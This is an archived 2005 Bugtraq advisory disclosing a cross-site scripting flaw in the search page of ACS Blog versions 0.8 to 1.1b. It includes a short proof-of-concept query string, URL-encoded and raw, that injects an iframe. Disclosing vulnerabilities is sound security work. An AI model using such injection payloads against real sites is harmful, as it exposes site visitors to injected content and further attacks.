XSS in ACS blog

From: farhad koosha (farhadkey_at_yahoo.com)
Date: 03/17/05

  • Next message: Jonathan Whiteley: "PHP mcNews arbitrary file inclusion"
    Date: 17 Mar 2005 08:24:01 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).

    Vulnerable :

    ACS Blog v 0.8
    ACS Blog v 0.9
    ACS Blog v 1.0
    ACS Blog v 1.1b

    Code :

    /search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E

    or goto /search.asp and copy this code :
    "<br><iframe src="http://google.com"></iframe>

    Vendor URL : http://www.asppress.com


  • Next message: Jonathan Whiteley: "PHP mcNews arbitrary file inclusion"